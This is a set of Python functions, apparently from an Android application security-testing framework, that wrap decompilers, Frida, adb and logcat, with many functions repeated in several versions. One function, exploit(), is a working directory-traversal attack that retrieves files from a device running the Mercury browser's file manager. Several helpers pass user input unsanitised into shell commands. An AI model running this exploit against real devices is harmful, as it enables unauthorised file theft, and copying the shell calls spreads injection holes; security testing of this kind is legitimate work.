def run_d2j(self):
"""
Run d2j-dex2jar.sh on a target APK and drop JAR into the output
directory
"""
print(
t.green("[{0}] ".format(datetime.now())) +
t.yellow("Running dex2jar : ") + self.apk)
try:
Popen([
"{0} output/d2j/{1}.jar {2}".format(
D2JEnum.commands.get("decompile"), self.directory,
self.apk)
],
shell=True).wait()
print(
t.green("[{0}] ".format(datetime.now())) +
t.yellow("Finished!"))
except CalledProcessError as e:
print(t.red("[{0}] ".format(datetime.now)) + e.returncode)
Logger.run_logger(e.message)
def do_scalpel(args):
"""
Description:
Requirements:
Usage:
"""
if args:
if args == enum.SCALPEL_ARGS_START_SERVER:
print(
t.green(
"[{0}] ".format(datetime.now()) + t.red(enum.SCAlPEL_BANNER) + t.yellow(enum.SCAlPEL_SERVER)
)
)
try:
from framework.brains.scalpel.server.scalpel_server import ScalpelServer
global scalpel
# Instantiate the ScalpelServer
#
scalpel = ScalpelServer()
scalpel.run()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_SCALPEL))
Logger.run_logger(e.message)
else:
print(t.red("[{0}] ".format(datetime.now()) + enum.ARGUMENTS))
def run_parse_uri(self):
"""
Use adb to load up the
Main Activity and point it back out our blocking
web server in order to trigger the parsing of the
intent:// URL scheme
"""
# Target package and activity
#
activity = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Enter the target Activity: ")))
target = "{0}/{1}".format(self.apk.get_package(), activity)
print(t.green("[{0}] ".format(datetime.now())) +
t.yellow("Target URI : ") +
"{0}".format(target))
try:
with open("{0}/framework/config".format(os.getcwd()), "r") as config:
ip = config.readline().strip("\n")
config.close()
url = "http://{0}:5000/services/intent".format(ip)
Popen(["{0} -n {1} -d {2}".format(ADBEnum.commands.get("am start"), target, url)], shell=True).wait()
print(t.green("[{0}] ".format(datetime.now())) +
t.yellow("Command successful : Check you device!"))
except IOError as e:
print(t.red("[{0}]".format(datetime.now()) + "Unable to read config"))
Logger.run_logger(e.message)
def do_components(args):
"""
Description: Enumerate components for target APK
Requirements: Loaded APK
Usage: components
"""
try:
from framework.brains.apk.enumeration.components import Components
if globals()["apk"] is not None:
# Instantiate components
# module
#
c = Components(globals()["apk"])
c.enum_component()
else:
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.MODULE_UNAVAILABLE))
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.COMPONENTS_MODULE_MESSAGE))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_COMPONENTS))
Logger.run_logger(e.message)
def do_debuggable(args):
"""
Description: Make target APK debuggable
Requirements: Target APK
Usage: debuggable <name_of_output_directory> && </path/to/apk>
"""
try:
from framework.brains.apk.debuggable import Debuggable
# Instantiate debuggable
# module
#
d = Debuggable(args.split()[0], args.split()[1])
d.run_debuggable()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_DEBUGGABLE))
Logger.run_logger(e.message)
except Exception as e:
if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.ARGUMENTS)))
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.DEBUGGABLE_USAGE)))
def do_d2j(args):
"""
Description: Runs d2j-dex2jar.sh on the target APK
Requirements: Target APK
Usage: d2j <directory_name> </path/to/apk>
"""
try:
from framework.brains.dex2jar.d2j import D2J
# Instantiate d2j
# module
#
d = D2J(args.split()[0], args.split()[1])
d.run_d2j()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_D2J))
Logger.run_logger(e.message)
except Exception as e:
if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.ARGUMENTS)))
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.D2J_USAGE)))
def do_surgical(args):
"""
Description: Instantiates the SurgicalAPI with available functions and operations
Requirements: Loaded APK
Usage: surgical
"""
try:
from framework.brains.surgical.api import SurgicalAPI
if globals()["apks"] is not None:
# Instantiate surgicalAPI
#
s = SurgicalAPI(globals()["apks"], "apks")
s.run_surgical()
elif globals()["dex"] is not None:
s = SurgicalAPI(globals()["dex"], "dex")
s.run_surgical()
else:
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.MODULE_UNAVAILABLE))
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.SURGICAL_MODULE_MESSAGE))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_SURGICAL))
Logger.run_logger(e.message)
def do_frida(args):
"""
Description: Runs the Frida instrumentation toolkit against a target process
Requirements: Loaded APK
Usage: frida
"""
try:
from framework.brains.dynamic.frida.instrumentation import Frida
if globals()["apk"] is not None:
# Instantiate frida
# module
#
i = Frida(globals()["apk"])
i.run_frida()
else:
print(
t.red("[{0}] ".format(datetime.now())) +
t.white("Module not available"))
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.FRIDA_MODULE_MESSAGE))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_FRIDA))
Logger.run_logger(e.message)
def do_bowser(args):
"""
Description: Runs the bowser toolkit on a target APK
Requirements: Loaded APK, Lobotomy web services
Usage: bowser <enum> || <parseUri>
"""
try:
from framework.brains.bowser.bowser import Bowser
if globals()["apk"] is not None and globals()["apks"] is not None:
b = Bowser(globals()["apks"], globals()["apk"])
if args.split()[0] == "enum":
b.run_bowser()
if args.split()[0] == "parseUri":
b.run_parse_uri()
else:
print(t.red("[{0}] ".format(datetime.now())) +
t.white("Module not available"))
print(t.red("[{0}] ".format(datetime.now())) +
t.white("You cannot run the bowser module without a target executable"))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Bowser"))
Logger.run_logger(e.message)
def do_surgical(args):
"""
Description: Instantiates the SurgicalAPI with available functions and operations
Requirements: Loaded APK
Usage: surgical
"""
try:
from framework.brains.surgical.api import SurgicalAPI
if globals()["apks"] is not None:
# Instantiate surgicalAPI
#
s = SurgicalAPI(globals()["apks"], "apks")
s.run_surgical()
elif globals()["dex"] is not None:
s = SurgicalAPI(globals()["dex"], "dex")
s.run_surgical()
else:
print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE))
print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.SURGICAL_MODULE_MESSAGE))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_SURGICAL))
Logger.run_logger(e.message)
def do_attacksurface(args):
"""
Description: Enumerates attacksurface for target APK
Requirements: Loaded APK
Usage: attacksurface
"""
try:
from framework.brains.apk.enumeration.attack_surface import AttackSurface
if globals()["apk"] is not None:
# Instantiate attacksurface
# module
#
c = AttackSurface(globals()["apk"])
c.run_enum_attack_surface()
else:
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.MODULE_UNAVAILABLE))
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.ATTACKSURFACE_MODULE_MESSAGE))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_ATTACKSURFACE))
Logger.run_logger(e.message)
def do_exploit(args):
"""
Description: Instantiates the ExploitAPI with available exploits
Requirements: Loaded APK
Usage: [exploit] & [type] & [name] [module] - Example: exploit browser mercury wfm
"""
try:
from framework.brains.exploits.api import ExploitAPI
if args.split()[0] and args.split()[1] and args.split()[2]:
# The Exploit API is always
# expecting these **kwargs
ExploitAPI(exploit=args.split()[0],
name=args.split()[1],
module=args.split()[2])
else:
print(
t.red("[{0}] ".format(datetime.now()) +
"Not enough arguments!"))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
"Unable to import the ExploitAPI"))
Logger.run_logger(e.message)
def do_permissions(args):
"""
Description: List enumeration and api mappings from target APK
Requirements: Loaded APK
Usage: permissions <list> || <map>
"""
try:
from framework.brains.apk.enumeration.permissions import PermissionsList, PermissionsMap
if args == "list":
if globals()["apk"] is not None:
p = PermissionsList(globals()["apk"])
p.run_list_permissions()
else:
print(t.red("[{0}] ".format(datetime.now())) +
t.white("Module not available"))
print(t.red("[{0}] ".format(datetime.now())) +
t.white("You cannot list permissions with out a loaded APK"))
if args == "map":
if globals()["apk"] is not None and globals()["apks"] is not None:
p = PermissionsMap(globals()["apk"], globals()["apks"])
p.run_map_permissions()
else:
print(t.red("[{0}] ".format(datetime.now())) +
t.white("Module not available"))
print(t.red("[{0}] ".format(datetime.now())) +
t.white("You cannot map permissions with out an executable or APK"))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Permissions"))
Logger.run_logger(e.message)
def do_decompile(args):
"""
Description: Decompile target APK with apktool.jar
Requirements: Target APK
Usage: decompile <name_of_output_directory> && </path/to/apk>
"""
try:
from framework.brains.apk.decompile import Decompile
if args[0] and args[1]:
decompile = Decompile(args.split()[0], args.split()[1])
decompile.run_decompile()
else:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.ARGUMENTS)))
except Exception as e:
if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.ARGUMENTS)))
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.DECOMPILE_USAGE)))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.IMPORT_ERROR_DECOMPILE)))
Logger.run_logger(e.message)
def run_parse_uri(self):
"""
Use adb to load up the
Main Activity and point it back out our blocking
web server in order to trigger the parsing of the
intent:// URL scheme
"""
# Target package and activity
#
activity = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Enter the target Activity: ")))
target = "{0}/{1}".format(self.apk.get_package(), activity)
print(t.green("[{0}] ".format(datetime.now())) +
t.yellow("Target URI : ") +
"{0}".format(target))
try:
with open("{0}/framework/config".format(os.getcwd()), "r") as config:
ip = config.readline().strip("\n")
config.close()
url = "http://{0}:5000/services/intent".format(ip)
Popen(["{0} -n {1} -d {2}".format(ADBEnum.commands.get("am start"), target, url)], shell=True).wait()
print(t.green("[{0}] ".format(datetime.now())) +
t.yellow("Command successful : Check you device!"))
except IOError as e:
print(t.red("[{0}]".format(datetime.now()) + "Unable to read config"))
Logger.run_logger(e.message)
def do_surgical(args):
"""
Description: Instantiates the SurgicalAPI with available functions and operations
Requirements: Loaded APK
Usage: surgical
"""
try:
from framework.brains.surgical.api import SurgicalAPI
if globals()["apks"] is not None:
s = SurgicalAPI(globals()["apks"], "apks")
s.run_surgical()
elif globals()["dex"] is not None:
s = SurgicalAPI(globals()["dex"], "dex")
s.run_surgical()
else:
print(t.red("[{0}] ".format(datetime.now())) +
t.white("Module not available"))
print(t.red("[{0}] ".format(datetime.now())) +
t.white("You cannot run the surgical module without a target executable"))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import the SurgicalAPI"))
Logger.run_logger(e.message)
def do_loader(args):
"""
Description: Load target APK for analysis wth androguard --
Requirements: Target APK
Usage: loader </path/to/apk>
Usage: loader apk </path/to/apk>
"""
try:
from framework.brains.apk.loader import Loader
# Pass arguments to
# the loader module
#
loader = Loader(args)
global apk, apks, dex
if args.split()[0] == "apk":
apk = loader.run_loader()
apks = None
elif args.split()[0] == "dex":
dex = loader.run_loader()
apk = None
apks = None
else:
apk, apks = loader.run_loader()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Loader"))
Logger.run_logger(e.message)
def do_scalpel(args):
"""
Description:
Requirements:
Usage:
"""
if args:
if args == enum.SCALPEL_ARGS_START_SERVER:
print(
t.green("[{0}] ".format(datetime.now()) +
t.red(enum.SCAlPEL_BANNER) +
t.yellow(enum.SCAlPEL_SERVER)))
try:
from framework.brains.scalpel.server.scalpel_server import ScalpelServer
global scalpel
# Instantiate the ScalpelServer
#
scalpel = ScalpelServer()
scalpel.run()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_SCALPEL))
Logger.run_logger(e.message)
else:
print(t.red("[{0}] ".format(datetime.now()) + enum.ARGUMENTS))
def do_profiler(args):
"""
Description: Run profiling on the target APK loaded
Requirements: Loaded APK
Usage: profiler
"""
try:
from framework.brains.apk.enumeration.profiler import Profiler
if globals()["apk"] is not None:
p = Profiler(globals()["apk"])
p.run_profiler()
else:
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.MODULE_UNAVAILABLE))
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.PROFILER_MODULE_MESSAGE))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_LOADER))
Logger.run_logger(e.message)
def do_permissions(args):
"""
Description: List enumeration and api mappings from target APK
Requirements: Loaded APK
Usage: permissions <list> || <map>
"""
try:
from framework.brains.apk.enumeration.permissions import PermissionsList, PermissionsMap
if args:
if args == "list":
if globals()["apk"] is not None:
# Instantiate permissions
# module
#
p = PermissionsList(globals()["apk"])
p.run_list_permissions()
else:
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.MODULE_UNAVAILABLE))
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.PERMISSIONS_LIST_MODULE_MESSAGE))
if args == "map":
if globals()["apk"] is not None and globals(
)["apks"] is not None:
# Instantiate permissions
# module
p = PermissionsMap(globals()["apk"], globals()["apks"])
p.run_map_permissions()
else:
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.MODULE_UNAVAILABLE))
print(
t.red("[{0}] ".format(datetime.now())) +
t.white(enum.PERMISSIONS_MAP_MODULE_MESSAGE))
else:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.ARGUMENTS)))
except Exception as e:
if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.ARGUMENTS)))
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.DECOMPILE_USAGE)))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_PERMISSIONS))
Logger.run_logger(e.message)
def exploit(self):
"""
Handle exploit operations
"""
ip = None
while True:
with open("".join([os.getcwd(), "/framework/config"]), "r") as f:
web_service = "http://{0}:5000/exploits/mercury/wfm/check".format(f.readline().strip("\n"))
f.close()
print(t.green("[{0}] ".format(datetime.now()) +
t.yellow("Polling ...")))
try:
r = requests.get(web_service)
if r.text == "Not Engaged":
time.sleep(2)
continue
else:
# Response should contain
# device IP address
#
ip = r.text
print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Exploit ready! Target IP : ") + ip)
break
except requests.HTTPError as e:
raise e
except requests.ConnectionError as e:
raise e
# Setup requests
# parameters
#
url = "".join(["http://{0}:8888/dodownload?fname=".format(ip), MercuryEnum().dir_trav_path])
headers = {"Referer": "http://{0}:8888/".format(ip)}
try:
for f in MercuryEnum.files:
print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Retrieving ") + "{0}".format(f)))
local = "".join([os.getcwd(), MercuryEnum.download_dir, f.split("/")[-1]])
r = requests.get("".join([url, f]), headers=headers, stream=True)
if r.status_code == 200:
with open(local, "wb") as l:
for data in r.iter_content(chunk_size=1024):
l.write(data)
l.flush()
except requests.HTTPError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Http error, check logs!"))
Logger.run_logger(e.message)
except requests.ConnectionError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Connection error, check logs!"))
# Unicode error
#
Logger.run_logger(e.message[0])
def run_decompile(self):
"""
Decompile target APK with apktool.jar
"""
print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Decompiling : ") + self.apk)
try:
Popen("java -jar {0} d {1} -f -o output/{2}".format("".join([os.getcwd(), "/bin/apktool.jar"]),
self.apk,
self.directory), shell=True).wait()
print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Finished!"))
except CalledProcessError as e:
print(t.red("[{0}] ".format(datetime.now)) + e.returncode)
Logger.run_logger(e.message)
def do_decompile(args):
"""
Description: Decompile target APK with apktool.jar
Requirements: Target APK
Usage: decompile <name_of_output_directory> && </path/to/apk>
"""
try:
from framework.brains.apk.decompile import Decompile
decompile = Decompile(args.split()[0], args.split()[1])
decompile.run_decompile()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Decompile"))
Logger.run_logger(e.message)
def do_surgical(args):
"""
Description: Instantiates the SurgicalAPI with available functions and operations
Requirements: Loaded APK
Usage: surgical
"""
try:
from framework.brains.surgical.api import SurgicalAPI
s = SurgicalAPI(globals()["apks"])
s.run_surgical()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import the SurgicalAPI"))
Logger.run_logger(e.message)
def do_attacksurface(args):
"""
Description: Enumerates attacksurface for target APK
Requirements: Loaded APK
Usage: attacksurface
"""
try:
from framework.brains.apk.enumeration.attack_surface import AttackSurface
c = AttackSurface(globals()["apk"])
c.run_enum_attack_surface()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import AttackSurface"))
Logger.run_logger(e.message)
def do_profiler(args):
"""
Description: Run profiling on the target APK loaded
Requirements: Loaded APK
Usage: profiler
"""
try:
from framework.brains.apk.enumeration.profiler import Profiler
p = Profiler(globals()["apk"])
p.run_profiler()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Profiler"))
Logger.run_logger(e.message)
def do_components(args):
"""
Description: Enumerate components for target APK
Requirements: Loaded APK
Usage: permissions
"""
try:
from framework.brains.apk.enumeration.components import Components
c = Components(globals()["apk"])
c.enum_component()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Components"))
Logger.run_logger(e.message)
def do_frida(args):
"""
Description: Runs the Frida instrumentation toolkit against a target process
Requirements: Loaded APK
Usage: frida
"""
try:
from framework.brains.dynamic.frida.instrumentation import Instrumentation
i = Instrumentation(globals()["apk"])
i.run_instrumentation()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Instrumentation"))
Logger.run_logger(e.message)
def do_d2j(args):
"""
Description: Runs d2j-dex2jar.sh on the target APK
Requirements: Target APK
Usage: d2j <directory_name> </path/to/apk>
"""
try:
from framework.brains.dex2jar.d2j import D2J
d = D2J(args.split()[0], args.split()[1])
d.run_d2j()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import D2J"))
Logger.run_logger(e.message)
def run_profiler(self):
"""
Profiles the target APK
"""
print(t.green("[{0}] ".format(datetime.now())) +
t.yellow("Running profiler against: ") +
self.apk.filename)
# Going to wrap this in a try block
# just in case anything fails
#
try:
package, sdk, backups, files = self.apk.get_package(), \
self.apk.get_target_sdk_version(), \
self.apk.get_element("application", "allowBackup"), \
self.apk.get_files()
if package:
print(t.green("[{0}] ".format(datetime.now()) +
t.yellow("Package name : ") +
package))
if sdk:
print(t.green("[{0}] ".format(datetime.now()) +
t.yellow("Target SDK version : ") +
sdk))
if backups:
print(t.green("[{0}] ".format(datetime.now()) +
t.yellow("Backups allowed : ") +
backups))
if files:
for f in files:
print(t.green("[{0}] ".format(datetime.now()) +
t.yellow("File : ") +
f))
except Exception as e:
# Staying generic for
# the moment
#
print(t.green("[{0}] ".format(datetime.now()) +
t.red(e.message)))
Logger.run_logger(e.message)
def do_profiler(args):
"""
Description: Run profiling on the target APK loaded
Requirements: Loaded APK
Usage: profiler
"""
try:
from framework.brains.apk.enumeration.profiler import Profiler
p = Profiler(globals()["apk"])
p.run_profiler()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
"Unable to import Profiler"))
Logger.run_logger(e.message)
def do_loader(args):
"""
Description: Load target APK for analysis wth androguard --
Requirements: Target APK
Usage: loader </path/to/apk>
"""
try:
from framework.brains.apk.loader import Loader
loader = Loader(args)
global apk, apks
apk, apks = loader.run_loader()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Loader"))
Logger.run_logger(e.message)
def do_logcat(args):
"""
Description: Runs logcat against the target APK and sends the output
to its RESTFul service handler
Requirements: Loaded APK
Usage: logcat
"""
try:
from framework.brains.dynamic.logcat import Logcat
l = Logcat()
l.run_logcat()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Logcat"))
Logger.run_logger(e.message)
def do_surgical(args):
"""
Description: Instantiates the SurgicalAPI with available functions and operations
Requirements: Loaded APK
Usage: surgical
"""
try:
from framework.brains.surgical.api import SurgicalAPI
s = SurgicalAPI(globals()["apks"])
s.run_surgical()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
"Unable to import the SurgicalAPI"))
Logger.run_logger(e.message)
def do_components(args):
"""
Description: Enumerate components for target APK
Requirements: Loaded APK
Usage: permissions
"""
try:
from framework.brains.apk.enumeration.components import Components
c = Components(globals()["apk"])
c.enum_component()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
"Unable to import Components"))
Logger.run_logger(e.message)
def do_frida(args):
"""
Description: Runs the Frida instrumentation toolkit against a target process
Requirements: Loaded APK
Usage: frida
"""
try:
from framework.brains.dynamic.frida.instrumentation import Instrumentation
i = Instrumentation(globals()["apk"])
i.run_instrumentation()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
"Unable to import Instrumentation"))
Logger.run_logger(e.message)
def do_attacksurface(args):
"""
Description: Enumerates attacksurface for target APK
Requirements: Loaded APK
Usage: attacksurface
"""
try:
from framework.brains.apk.enumeration.attack_surface import AttackSurface
c = AttackSurface(globals()["apk"])
c.run_enum_attack_surface()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
"Unable to import AttackSurface"))
Logger.run_logger(e.message)
def do_loader(args):
"""
Description: Load target APK for analysis wth androguard --
Requirements: Target APK
Usage: loader </path/to/apk>
"""
try:
from framework.brains.apk.loader import Loader
loader = Loader(args)
global apk, apks
apk, apks = loader.run_loader()
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
"Unable to import Loader"))
Logger.run_logger(e.message)
def http_handler(output):
"""
Handler for submitting logs to the
logcat web service
"""
try:
with open("{0}/framework/config".format(os.getcwd()),
"r") as config:
ip = config.readline()
config.close()
# Populate POST request
# with output from
# Logcat
#
data = {"data": output}
# TODO - 07/26/2015
# Remove hardcoded string and add to enums
#
r = requests.post("http://{0}:5000/services/logcat/update".format(
ip.strip("\n")),
data=data)
if r.text == "Success":
print(
t.green("[{0}] ".format(datetime.now()) +
t.yellow("Success!")))
else:
print(
t.green("[{0}] ".format(datetime.now()) +
t.red("Error! ") + "Check flask.log"))
except IOError as e:
print(t.red("[{0}] ".format(datetime.now()) + e))
Logger.run_logger(e)
except requests.ConnectionError as e:
print(t.red("[{0}] ".format(datetime.now()) + e.response))
Logger.run_logger(e.response)
return
def do_exploit(args):
"""
Description: Instantiates the ExploitAPI with available exploits
Requirements: Loaded APK
Usage: [exploit] & [type] & [name] [module] - Example: exploit browser mercury wfm
"""
try:
from framework.brains.exploits.api import ExploitAPI
if args.split()[0] and args.split()[1] and args.split()[2]:
ExploitAPI(exploit=args.split()[0], name=args.split()[1], module=args.split()[2])
else:
print(t.red("[{0}] ".format(datetime.now()) + "Not enough arguments!"))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import the ExploitAPI"))
Logger.run_logger(e.message)
def do_loader(args):
"""
Description: Load target APK or classes.dex for analysis
Requirements: APK or Dalvik Executable
Usage: loader </path/to/apk> - Load APK which includes classes.dex
Usage: loader apk </path/to/apk> - Load APK which does not include classes.dex
Usage: loader dex </path/to/classes.dex> - Load classes.dex
"""
try:
from framework.brains.apk.loader import Loader
# Pass arguments to the loader module
loader = Loader(args)
# Define global variables
global apk, apks, dex
# Begin to check command line arguments for the loader module
if args:
# APK only
if args.split()[0] == enum.APK:
apk, apks = loader.run_loader(), None
# DEX only
elif args.split()[0] == enum.DEX:
dex, apk, apks = loader.run_loader(), None, None
else:
apk, apks = loader.run_loader()
else:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.ARGUMENTS)))
except Exception as e:
if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR:
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.ARGUMENTS)))
print(
t.red("[{0}] ".format(datetime.now()) +
t.white(enum.LOADER_USAGE)))
except ImportError as e:
print(
t.red("[{0}] ".format(datetime.now()) +
enum.IMPORT_ERROR_LOADER))
Logger.run_logger(e.message)
def http_handler(output):
"""
Handler for submitting logs to the
logcat web service
"""
try:
with open("{0}/framework/config".format(os.getcwd()), "r") as config:
ip = config.readline()
config.close()
# Populate POST request
# with output from
# Logcat
#
data = {"data": output}
# TODO - 07/26/2015
# Remove hardcoded string and add to enums
#
r = requests.post("http://{0}:5000/services/logcat/update".format(ip.strip("\n")), data=data)
if r.text == "Success":
print(t.green("[{0}] ".format(datetime.now()) +
t.yellow("Success!")))
else:
print(t.green("[{0}] ".format(datetime.now()) +
t.red("Error! ") +
"Check flask.log"))
except IOError as e:
print(t.red("[{0}] ".format(datetime.now()) +
e))
Logger.run_logger(e)
except requests.ConnectionError as e:
print(t.red("[{0}] ".format(datetime.now()) +
e.response))
Logger.run_logger(e.response)
return
def do_profiler(args):
"""
Description: Run profiling on the target APK loaded
Requirements: Loaded APK
Usage: profiler
"""
try:
from framework.brains.apk.enumeration.profiler import Profiler
if globals()["apk"] is not None:
p = Profiler(globals()["apk"])
p.run_profiler()
else:
print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE))
print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.PROFILER_MODULE_MESSAGE))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_LOADER))
Logger.run_logger(e.message)
def do_bowser(args):
"""
Description: Runs the bowser toolkit on a target APK
Requirements: Loaded APK, Lobotomy web services
Usage: bowser <enum> || <parseUri>
"""
try:
from framework.brains.bowser.bowser import Bowser
b = Bowser(globals()["apks"], globals()["apk"])
if args.split()[0] == "enum":
b.run_bowser()
if args.split()[0] == "parseUri":
b.run_parse_uri()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Bowser"))
Logger.run_logger(e.message)
def do_permissions(args):
"""
Description: List enumeration and api mappings from target APK
Requirements: Loaded APK
Usage: permissions <list> || <map>
"""
try:
from framework.brains.apk.enumeration.permissions import Permissions
p = Permissions(globals()["apk"], globals()["apks"])
if args == "list":
p.run_list_permissions()
if args == "map":
p.run_map_permissions()
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Permissions"))
Logger.run_logger(e.message)
def do_permissions(args):
"""
Description: List enumeration and api mappings from target APK
Requirements: Loaded APK
Usage: permissions <list> || <map>
"""
try:
from framework.brains.apk.enumeration.permissions import PermissionsList, PermissionsMap
if args:
if args == "list":
if globals()["apk"] is not None:
# Instantiate permissions
# module
#
p = PermissionsList(globals()["apk"])
p.run_list_permissions()
else:
print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE))
print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.PERMISSIONS_LIST_MODULE_MESSAGE))
if args == "map":
if globals()["apk"] is not None and globals()["apks"] is not None:
# Instantiate permissions
# module
p = PermissionsMap(globals()["apk"], globals()["apks"])
p.run_map_permissions()
else:
print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE))
print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.PERMISSIONS_MAP_MODULE_MESSAGE))
else:
print(t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS)))
except Exception as e:
if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR:
print(t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS)))
print(t.red("[{0}] ".format(datetime.now()) + t.white(enum.DECOMPILE_USAGE)))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_PERMISSIONS))
Logger.run_logger(e.message)
def run_logcat(self):
"""
Run Logcat with a keyword search that dumps
output
"""
while True:
result = raw_input(t.green("[{0}] ".format(datetime.now()) +
t.yellow("Would you like to run Logcat? { Y || N } : ")))
if result == "N":
break
elif result == "Y":
keyword = raw_input(t.green("[{0}] ".format(datetime.now()) +
t.yellow("Enter keyword search : ")))
try:
p = Popen("adb logcat -d | grep {0}".format(keyword),
stdout=PIPE,
stderr=PIPE,
shell=True)
# Create a new Timer()
# object and handle process timeouts
# with a callback
#
thread = Timer(3.0, self.timeout, [p])
thread.start()
thread.join()
except CalledProcessError as e:
print(t.red("[{0}] ".format(datetime.now()) +
e.returncode))
Logger.run_logger(e.message)
except IOError as e:
print(t.red("[{0}] ".format(datetime.now()) +
e.message))
Logger.run_logger(e.message)
def run_d2j(self):
"""
Run d2j-dex2jar.sh on a target APK and drop JAR into the output
directory
"""
print(t.green("[{0}] ".format(datetime.now())) +
t.yellow("Running dex2jar : ") +
self.apk)
try:
Popen(["{0} output/d2j/{1}.jar {2}".format(D2JEnum.commands.get("decompile"),
self.directory, self.apk)],
shell=True).wait()
print(t.green("[{0}] ".format(datetime.now())) +
t.yellow("Finished!"))
except CalledProcessError as e:
print(t.red("[{0}] ".format(datetime.now)) + e.returncode)
Logger.run_logger(e.message)
def run_instrumentation(self):
"""
Select and run instrumentation function using the
Frida instrumentation toolkit
"""
while True:
print(t.green("[{0}] ".format(datetime.now()) +
